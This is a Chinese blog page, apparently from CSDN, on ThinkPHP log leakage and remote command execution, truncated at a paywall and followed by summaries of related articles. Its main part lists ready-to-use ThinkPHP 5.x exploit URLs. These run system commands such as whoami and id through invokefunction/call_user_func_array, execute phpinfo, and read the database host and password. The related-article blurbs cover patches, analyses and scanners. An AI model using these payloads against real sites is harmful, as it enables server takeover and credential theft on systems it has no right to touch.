thinkphp日志泄漏漏洞_thinkPHP命令执行漏洞

最新推荐文章于 2024-10-31 17:33:34 发布
原创 最新推荐文章于 2024-10-31 17:33:34 发布 · 708 阅读 · 0
标签
#thinkphp日志泄漏漏洞
本文详细探讨了ThinkPHP中的日志泄漏漏洞及其可能导致的命令执行风险。通过不同方式,如反射、函数调用等,可以执行系统命令和PHP代码。此外,文章还列举了多种获取系统信息、写入shell的方法,并介绍了如何利用日志文件进行文件包含攻击,以执行恶意代码。

thinkPHP中反斜杠的作用是类库\命名空间

命令执行的姿势

通过反射invokefunction调用call_user_func_array方法,call_user_func_array函数接受两个参数,第一个为函数名,第二个为函数参数数组,如下所示,通过call_user_func_array函数调用system执行whoami函数

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

执行php代码

?s=index/\think\Request/input&filter=phpinfo&data=1

获取当前数据库名称

?s=index/think\config/get&name=database.hostname

获取当前数据库密码

?s=index/think\config/get&name=database.password

执行php代码

?s=index/\think\view\driver\Php/display&content=<?php %20phpinfo();?>

执行php代码

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

执行php代码

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

执行php代码

?s=index/\think\Container/invokefun

最低0.47元/天 解锁文章
如何解决ThinkPHP 日志信息泄露漏洞
刘杨造梦的博客
08-12 1455
由此可见,国外还是挺脏的。都2024年了,买源码别再买thinkPHP3.x和thinkPHP5.x框架的源码了,最近几个月已经碰到两三个这5.x的了,找我修复,有个冤大头买个源码花了一两万结果还是5.x框架的,新项目现在都用thinkPHP8.x了,再怎么不行,用thinkPHP6.x也可以的。我看了一下他们的网站后,好家伙,发现是thinkPHP而且是5.0.24,其实他这个就是thinkPHP日志信息泄露漏洞,我们修复一下就好了,完全不需要用到mysql触发器。
thinkphp日志泄漏漏洞_【缺陷周话】第50期:日志伪造
weixin_39616003的博客
12-08 627
聚焦源代码安全,网罗国内外最新资讯!*声明:《缺陷周话》栏目系列文章由奇安信代码卫士团队原创出品。未经许可,禁止转载。转载请注明“转自奇安信代码卫士 www.codesafe.cn”。代码审计是使用静态分析发现源代码中安全缺陷的方法,辅助开发或测试人员在软件上线前较为全面地了解安全问题,防患于未然,因此一直以来都是学术界和产业界研究的热点,并已成为安全开发生命周期SDL 和DevS...
ThinkPHP漏洞详解(自学)
m0_64481831的博客
03-01 4880
Thinkphp是一个快速、兼容而且简单的轻量级PHP开发框架。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架。Thinkphp发展至今,主要有2.x、3.x、5.x、6.x系列,其中2.x和3.x系列官方已停止维护,5.x系列是目前使用最多的一个系列,而3.x系列比较多的老用户。
ThinkPHP 日志信息泄露——漏洞复现
热门推荐
W小哥
02-20 2万+
一、漏洞简介 1ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志,而且debug很多网站都没有关 2、ThinkPHP默认安装后,也会在Runtime目录下生成日志 THINKPHP3.2 结构:Application\Runtime\Logs\Home\16_09_09.log THINKPHP3.1结构:Runtime\Logs\Home\16_09_09.log 日志存储结构是 :项目名\Runtime\Logs\Home\年份_月份_日期.log 注意: 日志信息非常详细
ThinkPHP漏洞总结(利用)
yangbz123的博客
04-26 1万+
ThinkPHP介绍 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。 ...
Goby 漏洞更新 |ThinkPHP Debug 模式日志信息泄露漏洞
m0_46699477的博客
04-21 1738
ThinkPHP 是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架。ThinkPHP Debug 模式存在日志信息泄露漏洞,在开启Debug的情况下会在Runtime目录下生成日志,攻击者通过构造特殊URL地址,读取日志敏感信息。
thinkphp日志泄漏漏洞_ThinkPHP 5.x远程命令执行漏洞分析与复现
weixin_39561673的博客
12-20 612
0x00 前言ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。0x01 影响范围5.x < 5.1.31, <= 5.0.230x02 漏洞分析路由信息中co...
thinkphp日志泄漏漏洞_ThinkPHP5 远程命令执行漏洞分析
weixin_39975529的博客
01-12 1177
前言ThinkPHP官方最近修复了一个严重的远程代码执行漏洞。这个主要漏洞原因是由于框架对控制器名没有进行足够的校验导致在没有开启强制路由的情况下可以构造恶意语句执行远程命令,受影响的版本包括5.0和5.1版本。测试环境:ThinkPHP 5.1 beta+ win10 64bit + wamp漏洞分析网上已经有些分析文章了,我就正向分析下这次漏洞过程。不同版本的ThinkPHP调用过程和代码会稍...
【免费下载】 强大的ThinkPHP漏洞检测工具:Thinkphp(GUI)
最新发布
gitblog_09730的博客
10-31 637
强大的ThinkPHP漏洞检测工具:Thinkphp(GUI) 【下载地址】ThinkphpGUI漏洞检测工具 本仓库提供了一个名为“Thinkphp(GUI)漏洞检测工具”的资源文件。该工具是一个图形化界面的漏洞利用工具,专门用于检测和利用ThinkPHP框架中的漏洞。它支持多个版本的ThinkPHP漏洞检测,包括命令...
thinkphp日志泄漏漏洞_Myscan被动漏洞扫描器
weixin_42510012的博客
12-10 822
介绍:myscan是参考awvs的poc目录架构,pocsuite3、sqlmap等代码框架,以及搜集互联网上大量的poc,由python3开发而成的被动扫描工具。此项目源自个人开发项目,结合个人对web渗透,常见漏洞原理和检测的代码实现实现,通用poc的搜集,被动扫描器设计,以及信息搜集等思考实践。运行原理myscan依赖burpsuite和redis,需启动redis和burpsui...
thinkphp日志泄漏漏洞_ThinkPHP漏洞分析与利用
weixin_39575775的博客
12-20 2253
一、组件介绍1.1 基本信息ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,遵循Apache 2开源协议发布,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQL...
thinkphp日志泄漏漏洞_THINKPHP5近期暴露的漏洞
weixin_39818691的博客
12-20 830
这个THINKPHP5的漏洞涉及好几个版本,我测试中5.0.21和5.0.22都有,据说是5.0 ~ 5.0.23之间的版本都存在,这个漏洞可以执行写文件的操作。当然了,赶紧升级框架到安全版本是比较好的方式,不过我这边测试了一下,发现确实可以通过url访问注入进行执行写文件操作,例如http://你的域名/public/index.php?s=/index/\think\app/invokefun...
thinkphp日志泄漏漏洞_Thinkphp5-x远程代码执行漏洞分析
weixin_39939668的博客
12-20 1219
漏洞介绍Thinkphp5.x版本(5.0.20)中没有对路由中的控制器进行严格过滤,在存在admin、index模块、没有开启强制路由的条件下(默认不开启),导致可以注入恶意代码利用反射类调用命名空间其他任意内置类,完成远程代码执行。影响版本THINKPHP 5.0.5-5.0.22THINKPHP 5.1.0-5.1.30漏洞分析这里选择对5.0.20版本进行分析,关键函数开头/thinkph...
thinkphp日志泄漏漏洞_ThinkPHP框架任意代码执行漏洞的利用及其修复方法
weixin_39955154的博客
12-20 1826
ThinkPHP是国内著名的开源的PHP框架,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。最早诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。早期的思想架构来源于Struts,后来经过不断改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结 构和MVC模式,融合了Struts的Action和Dao思想和JSP...
thinkphp日志泄漏漏洞_Thinkphp5 远程代码执行漏洞事件分析报告
weixin_39908263的博客
12-20 2414
作者:知道创宇404实验室时间:2018年12月19日0x00 背景2018年12月10日,ThinkPHP 官方发布《ThinkPHP 5.* 版本安全更新》,修复了一个远程代码执行漏洞。由于 ThinkPHP 框架对控制器名没有进行足够的检测,导致攻击者可能可以实现远程代码执行。知道创宇404实验室漏洞情报团队第一时间开始漏洞应急,复现了该漏洞,并进行深入分析。经过一系列测试和源码分析,最终确...
thinkphp日志泄漏漏洞_【Windows高危漏洞预警】CVE20200601,影响关键加密功能
weixin_35908791的博客
12-04 528
一、事件报告2020年伊始,NSA发现了一个影响Microsoft Windows加密功能的严重漏洞(CVE-2020-0601)。证书验证漏洞允许攻击者破坏Windows验证加密信任的方式,并且可以启用远程代码执行。该漏洞会影响Windows 10和Windows Server 2016/2019以及依赖Windows的信任功能的应用程序。利用此漏洞,攻击者可以击败受信任的网络连接并传...
thinkphp日志泄漏漏洞_ThinkPHP框架通杀所有版本的一个SQL注入漏洞详细分析及测试方法...
weixin_39999730的博客
12-20 1189
ThinkPHP 3.1.3及之前的版本存在一个SQL注入漏洞,漏洞存在于ThinkPHP/Lib/Core/Model.class.php 文件根据官方文档对"防止SQL注入"的方法解释(见http://doc.thinkphp.cn/manual/sql_injection.html)使用查询条件预处理可以防止SQL注入,没错,当使用如下代码时可以起到效果:$Model->where("...
thinkphp日志泄漏漏洞_记一次火绒帮助企业用户分析日志:仅一个月遭遇近万次漏洞攻击...
weixin_36087877的博客
01-02 831
企业网络环境错综复杂,包括终端管理混乱,对U盘、外设、共享文件夹等公用资源缺乏防护,员工安全意识良莠不齐等,都容易导致病毒能够轻易入侵终端和服务器。部分企业在安装安全软件发现并解决当前安全威胁后,未能引起重视,进行全面排查等措施,或导致后续依旧有被攻击的风险。实际上,当企业中安全软件成功拦截漏洞攻击、查杀出病毒时,也往往意味着企业内部存在安全隐患,或正在遭遇外部攻击。需要管理人员根据安全软件的查杀...
thinkphp日志泄漏漏洞_ThinkPHP框架被爆任意代码执行漏洞
weixin_39800387的博客
12-20 318
昨日ThinkPHP框架被爆出了一个php代码任意执行漏洞,黑客只需提交一段特殊的URL就可以在网站上执行恶意代码。ThinkPHP作为国内使用比较广泛的老牌PHP MVC框架,有不少创业公司或者项目都用了这个框架。不过大多数开发者和使用者并没有注意到本次漏洞的危害性,chinaz源码报导提醒:此漏洞是一个非常严重的问题,只要使用了thinkphp框架,就可以直接执行任意php代码,请使用thin...
常见的框架漏洞
m0_46467017的博客
08-20 1万+
Shiro默认使用了CookieRememberMeManager, 其处理cookie的流程是: 得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化.然而AES的密钥是硬编码的, 密钥泄漏的根本原因是开发人员在开发过程中部分代码直接使用了网上的一些开源的项目代码,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。cookie的key为RemeberMe,cookie的值是经过对相关信息进⾏序列化,然后使⽤aes加密,最后在使⽤base64编码处理形成的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值